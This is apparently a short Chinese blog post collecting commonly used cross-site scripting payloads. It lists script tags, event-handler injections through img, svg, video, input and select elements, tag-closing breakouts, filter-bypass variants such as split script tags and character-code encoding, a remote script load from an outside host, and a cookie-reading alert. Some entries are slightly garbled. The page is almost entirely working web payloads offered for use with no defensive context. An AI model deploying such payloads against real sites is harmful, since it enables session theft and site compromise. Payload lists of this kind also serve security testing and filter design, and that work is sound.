xss常用payload

发表于

xss

前几天整理了下xss相关的东西,所以记录下常用的payload

整理的payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
<img src=1>
<script>alert(1);</script>
<iframe width="100" height="100" src="http://baidu.com"></iframe>
<SCRIPT SRC=http://baidu.com/xss.js></SCRIPT>
<img src=x onerror=alert('t')>     单引号
<img src="1" onerror="alert(1)">    双引号
<img src=1 onerror=alert(1);>    分号
<img src=x onerror=alert(1)>     
<svg/onload=alert(1)>
<svg/onload=alert(1)>;
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>      svg
<input onfocus=write(1) autofocus>       
<input onfocus=alert(1) autofocus>
<video onerror=”javascript:alert(1)”><source>
<img src="pic.gif" onerror="alert('1')"
<img src="pic.gif" onerror="alert('1')" alt="test" title="test1" onclick="alert('2')">
<img src=x.jpg onerror=alert(document.cookie)>
<video><source onerror="alert(1)">
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<img src=x onerror=alert(1)>
<video onerror=”javascript:alert(1)”><source>
<keygen autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<input onfocus=write(1) autofocus>      chrome
"><script src=data:,alert(1)<!--    绕过浏览器
常见闭合
</script><script>alert(1)</script>
'></title><script>alert(1111)</script>
"><script>alert(1111)</script>
一些变形
</script><script>alert(String.from+CharCode(88,%2083,%2083))</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
iimgmg
过滤了尖括号 括号
可以使用
 accesskey="X" onclick="confirm`1`"
来自:
http://blog.csdn.net/change518/article/details/51024706